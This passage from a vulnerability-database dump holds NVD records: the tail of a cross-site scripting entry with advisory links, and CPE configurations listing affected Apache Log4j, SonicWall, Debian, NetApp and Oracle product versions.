"https://www.debian.org/security/2020/dsa-4693", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2020-002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-02", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-10", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-79", }, ], source: "security-advisories@github.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-79", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "42BCB94E-86D2-4B98-B9E6-5789F2272692", versionEndExcluding: "2.3.1", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "19DA22A8-0B29-4181-B44E-57D28D9DB331", versionEndExcluding: "2.12.3", versionStartIncluding: "2.4", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "61E2AC03-D49B-4A15-BDA4-61DAF142CEED", versionEndIncluding: "2.16.0", versionStartIncluding: "2.13.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", matchCriteriaId: "197D0D80-6702-4B61-B681-AFDBA7D69067", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", matchCriteriaId: "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", matchCriteriaId: "FA6FEEC2-9F11-4643-8827-749718254FED", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*", matchCriteriaId: "421BCD43-8ECC-4B1E-9F3E-C20BB2BC672A", versionEndIncluding: "10.0.12", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:on-premises:*:*:*", matchCriteriaId: "1EA49667-8F94-4091-B9A9-A94318D83C24", versionEndExcluding: "3.0", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:saas:*:*:*", matchCriteriaId: "7C1B257C-9442-4C73-91CB-67893A78F0DF", versionEndExcluding: "3.0", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:web_application_firewall:*:*:*:*:*:*:*:*", matchCriteriaId: "AD1E667A-9CAA-4382-957A-E4F1A4960E0C", 
versionEndExcluding: "3.1.0", versionStartIncluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "B407FBDB-7900-4F69-B745-809277F26050", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa12-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "05AF56AD-FBAF-4AB8-B04D-1E28BF10B767", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa22-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "E3103225-6440-43F4-9493-131878735B2A", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa22-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "2B3A0115-86AB-4677-A026-D99B971D9EF5", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa32-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "914A44DE-C4AA-45A0-AC26-5FAAF576130E", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa32-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "9D1C62CF-414A-4670-9F19-C11A381DB830", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa42-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "75359CC5-58A7-4B5A-B9BF-BDE59552EF1C", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa42-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "706A3F00-8489-4735-B09B-34528F7C556A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], 
operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa52-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "C23D02B7-C9A7-4ED9-AE71-765F01ACA55C", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa52-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "E9DCB171-E4C8-4472-8023-20992ABB9348", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_engineering_data_management:6.2.1.0:*:*:*:*:*:*:*", matchCriteriaId: "80C9DBB8-3D50-4D5D-859A-B022EB7C2E64", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", matchCriteriaId: "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm_mcad_connector:3.6:*:*:*:*:*:*:*", matchCriteriaId: "B0C0714E-4255-4095-B26C-70EB193B8F98", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", matchCriteriaId: "97994257-C9A4-4491-B362-E8B25B7187AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_deposits_and_lines_of_credit_servicing:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "1F834ACC-D65B-4CA3-91F1-415CBC6077E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_default_management:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "473749BD-267E-480F-8E7F-C762702DB66E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_default_management:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "320D36DA-D99F-4149-B582-3F4AB2F41A1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_loans_servicing:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "5E502A46-BAF4-4558-BC8F-9F014A2FB26A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_party_management:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "C542DC5E-6657-4178-9C69-46FD3C187D56", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:banking_payments:14.5:*:*:*:*:*:*:*", matchCriteriaId: "633E5B20-A7A7-4346-A71D-58121B006D00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "BDC6D658-09EA-4C41-869F-1C2EA163F751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_trade_finance:14.5:*:*:*:*:*:*:*", matchCriteriaId: "64750C01-21AC-4947-B674-6690EAAAC5DB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_treasury_management:14.5:*:*:*:*:*:*:*", matchCriteriaId: "3C3D0063-9458-4018-9B92-79A219716C10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "D40AD626-B23A-44A3-A6C0-1FFB4D647AE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_asap:7.3:*:*:*:*:*:*:*", matchCriteriaId: "3141B86F-838D-491A-A8ED-3B7C54EA89C1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.4:*:*:*:*:*:*:*", matchCriteriaId: "B465F237-0271-4389-8035-89C07A52350D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.5:*:*:*:*:*:*:*", matchCriteriaId: "123CB9B5-C800-47FD-BD0C-BE44198E97E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "DAAB7154-4DE8-4806-86D0-C1D33B84417B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*", matchCriteriaId: "C2A5B24D-BDF2-423C-98EA-A40778C01A05", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "6F60E32F-0CA0-4C2D-9848-CB92765A9ACB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.1:*:*:*:*:*:*:*", matchCriteriaId: "DF616620-88CE-4A77-B904-C1728A2E6F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.8.0:*:*:*:*:*:*:*", matchCriteriaId: "3AA09838-BF13-46AC-BB97-A69F48B73A8A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "B4367D9B-BF81-47AD-A840-AC46317C774D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "BD4349FE-EEF8-489A-8ABF-5FCD55EC6DE0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_service_communication_proxy:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "175B97A7-0B00-4378-AD9F-C01B6D9FD570", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "C6EAA723-2A23-4151-930B-86ACF9CC1C0C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergence:3.0.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7DF939F5-C0E1-40A4-95A2-0CE7A03AB4EE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergence:3.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "EEC452FA-D1D5-4175-9371-F6055818192E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergent_charging_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "0172500D-DE51-44E0-91E8-C8F36617C1F8", versionEndIncluding: "12.0.4.0.0", versionStartIncluding: "12.0.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergent_charging_controller:6.0.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: 
"E99E7D49-AE53-4D16-AB24-EBEAAD084289", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", matchCriteriaId: "F9550113-7423-48D8-A1C7-95D6AEE9B33C", versionEndIncluding: "8.5.1.0", versionStartIncluding: "8.3.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_element_management_system:46.6:*:*:*:*:*:*:*", matchCriteriaId: "7FDD479D-9070-42E2-A8B1-9497BC4C0CF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "02712DD6-D944-4452-8015-000B9851D257", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", matchCriteriaId: "987811D5-DA5E-493D-8709-F9231A84E5F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.3:*:*:*:*:*:*:*", matchCriteriaId: "46E23F2E-6733-45AF-9BD9-1A600BD278C8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.4:*:*:*:*:*:*:*", matchCriteriaId: "E812639B-EE28-4C68-9F6F-70C8BF981C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DE7A60DB-A287-4E61-8131-B6314007191B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", matchCriteriaId: "26940103-F37C-4FBD-BDFD-528A497209D6", versionEndIncluding: "12.0.4.0.0", versionStartIncluding: "12.0.1.0.0", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB9047B1-DA8C-4BFD-BE41-728BD7ECF3E6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.3:*:*:*:*:*:*:*", matchCriteriaId: "00E9A2B1-7562-4E6B-AE25-1B647F24EFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.4:*:*:*:*:*:*:*", matchCriteriaId: "D6BDB265-293F-4F27-8CE0-576DF3ECD3BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.5:*:*:*:*:*:*:*", matchCriteriaId: "53600579-4542-4D80-A93C-3E45938C749D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_service_broker:6.2:*:*:*:*:*:*:*", matchCriteriaId: "E6235EAE-47DD-4292-9941-6FF8D0A83843", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "274BCA96-2E6A-4B77-B69E-E2093A668D28", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "8D4B738B-08CF-44F6-A939-39F5BEAF03B2", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", matchCriteriaId: "17A91FD9-9F77-42D3-A4D9-48BC7568ADE1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", 
matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_user_data_repository:12.4:*:*:*:*:*:*:*", matchCriteriaId: "0FAF2403-99A1-4DBC-BAC4-35D883D8E5D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA6214-A85D-4BF4-ABBF-0E4F8B7DA817", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "1F05AF4B-A747-4314-95AE-F8495479AB3E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9901F6BA-78D5-45B8-9409-07FF1C6DDD38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9FADE563-5AAA-42FF-B43F-35B20A2386C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:*", matchCriteriaId: "4B3C968F-4038-4A8D-A345-8CD3F73A653B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.4.1.1:*:*:*:*:*:*:*", matchCriteriaId: "615C7D0D-A9D5-43BA-AF61-373EC1095354", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.5.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6F772DC1-F93E-43A4-81DA-A2A1E204C5D5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: 
"7EA4D3C5-6A7C-4421-88EF-445A96DBCE0C", versionEndIncluding: "8.1.1", versionStartIncluding: "8.0.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.0.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F033C6C8-61D9-41ED-94E6-63BE7BA22EFC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.1.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4B829B72-7DE0-415F-A1AF-51637F134B76", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "FF8DC5FD-09DE-446F-879B-DB86C0CC95B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:*:*:*:*:*:*:*:*", matchCriteriaId: "B0148D20-089E-4C19-8CA3-07598D8AFBF1", versionEndIncluding: "12.4", versionStartIncluding: "12.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:*:*:*:*:*:*:*:*", matchCriteriaId: "54BE0CCE-8216-4CCF-96E1-38EF76124368", versionEndIncluding: "14.3.0", versionStartIncluding: "14.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:11.83.3:*:*:*:*:*:*:*", matchCriteriaId: "0017AE8C-DBCA-46B4-A036-DF0E289199D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:14.5:*:*:*:*:*:*:*", matchCriteriaId: "609645BF-B34F-40AC-B9C9-C3FB870F4ED2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.1.0.6:*:*:*:*:*:*:*", matchCriteriaId: "67013CB6-5FA6-438B-A131-5AEDEBC66723", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "8FC5F6E6-3515-439B-9665-3B6151CEF577", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:6.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "4CB4F0E6-3B36-4736-B2F2-CB2A16309F8D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:6.3.2.1:*:*:*:*:*:*:*", 
matchCriteriaId: "0E72CF27-6E5F-404E-B5DF-B470C99AF5E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:7.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "51BCEC65-25B7-480C-860C-9D97F78CCE3F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_information_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "16AEA21E-0B11-44A5-8BFB-550521D8E0D5", versionEndIncluding: "3.0.4", versionStartIncluding: "3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_data_repository:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "BA92E70A-2249-4144-B0B8-35501159ADB3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "9F69F8F6-BA2D-4DC6-BAB2-B9155F8B45CD", versionEndIncluding: "7.3.0.4", versionStartIncluding: "7.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_master_person_index:5.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10774601-93C3-4938-A3E7-3C3D97A6F73C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:4.1.0:*:*:*:*:*:*:*", matchCriteriaId: "523391D8-CB84-4EBD-B337-6A99F52E537F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:4.1.1:*:*:*:*:*:*:*", matchCriteriaId: "B0A3C700-710A-4A0A-A2D4-ABB7AAC9B128", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_suite8:8.13.0:*:*:*:*:*:*:*", matchCriteriaId: "D4833DCA-FC54-4F89-B2DF-8E39C9C49DF6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_suite8:8.14.0:*:*:*:*:*:*:*", matchCriteriaId: "AD7E9060-BA5B-4682-AC0D-EE5105AD0332", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_token_proxy_service:19.2:*:*:*:*:*:*:*", matchCriteriaId: "E7D45E2D-241B-4839-B255-A81107BF94BF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_bi\\+:*:*:*:*:*:*:*:*", matchCriteriaId: "9C083F1E-8BF2-48C7-92FB-BD105905258E", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_planning:*:*:*:*:*:*:*:*", matchCriteriaId: "C3E11E28-78AA-42BB-927D-D22CBDDD62B9", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_profitability_and_cost_management:*:*:*:*:*:*:*:*", matchCriteriaId: "30927787-2815-4BEF-A7C2-960F92238303", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_tax_provision:*:*:*:*:*:*:*:*", matchCriteriaId: "C0ABD2DC-9357-4097-BE62-BB7A4988A01F", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:9.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8508EF23-43DC-431F-B410-FD0BA897C371", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", matchCriteriaId: "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", matchCriteriaId: "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", matchCriteriaId: "7F69B9A5-F21B-4904-9F27-95C0F7A628E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_gateway:1.0.1:*:*:*:*:*:*:*", matchCriteriaId: 
"1B85A426-5714-4CEA-8A97-720F882B2D58", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "604FBBC9-04DC-49D2-AB7A-6124256431AF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2.0:*:*:*:*:*:*:*", matchCriteriaId: "428D2B1D-CFFD-49D1-BC05-2D85D22004DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:managed_file_transfer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "A2E3E923-E2AD-400D-A618-26ADF7F841A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:managed_file_transfer:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB58D27-37F2-4A32-B786-3490024290A1", vulnerable: true, }, { criteria: 